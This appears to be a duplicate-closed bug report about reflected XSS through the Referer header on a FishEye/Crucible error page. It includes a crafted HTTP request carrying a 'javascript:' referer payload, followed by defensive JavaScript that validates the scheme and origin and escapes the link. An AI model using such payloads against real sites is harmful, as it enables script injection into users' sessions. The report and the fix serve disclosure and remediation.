- Type: Bug
- Resolution: Duplicate
- Priority: Highest
- None
- Affects Version/s: 3.3.3
- Component/s: None

If the referrer header is manipulated and an error condition is triggered, the user is shown the error page in FeCru, which includes the manipulated referrer value on the page as a link. The use of the referrer header value directly as the target of a hyperlink can result in the user unknowingly executing code on the target system.

Reproducing this condition can be accomplished using a crafted request such as the one below:

GET /download/ HTTP/1.1
X-AUSERNAME: gsrobert
Referer: javascript:prompt(936711);
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Host: crucible-test.ksc.nasa.gov
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Acunetix-Product: WVS/9.0 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED

- duplicates
  - FE-5149 HTTP Referer "self-XSS" (Closed)
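
One way to build the error page's back link so that a Referer value like the one in the request above never becomes a link target, shown as an added example that is not FishEye/Crucible code and not part of the original report. The origin `https://fecru.example`, the function names and the sample inputs are assumptions made for illustration.

```javascript
'use strict';
// Added example; all names are hypothetical, not FishEye/Crucible code.
const APP_ORIGIN = 'https://fecru.example'; // constructed placeholder origin

// Return a normalized URL that is safe to use as an href, or null.
function safeRefererHref(referer, appOrigin = APP_ORIGIN) {
  if (typeof referer !== 'string' || referer.length === 0) return null;
  let url;
  try {
    // WHATWG parser: the scheme is decided the way a browser decides it.
    url = new URL(referer);
  } catch {
    return null; // relative or malformed values are rejected
  }
  // Allowlist the scheme; javascript:, data: and anything else is refused.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  // Only link back into the application itself.
  if (url.origin !== appOrigin) return null;
  return url.href;
}

// Escape a value for use inside a double-quoted HTML attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Render the "go back" link of an error page; fall back to the site root.
function renderBackLink(referer) {
  const href = safeRefererHref(referer);
  return `<a href="${escapeHtml(href === null ? '/' : href)}">Go back</a>`;
}

// Constructed sample Referer values; the second is the one from the report.
const SAMPLES = [
  'https://fecru.example/browse/repo?a=1&b=2',
  'javascript:prompt(936711);',
  'http://other.example/page',
  '/download/',
];
for (const r of SAMPLES) console.log(JSON.stringify(r), '->', renderBackLink(r));
```
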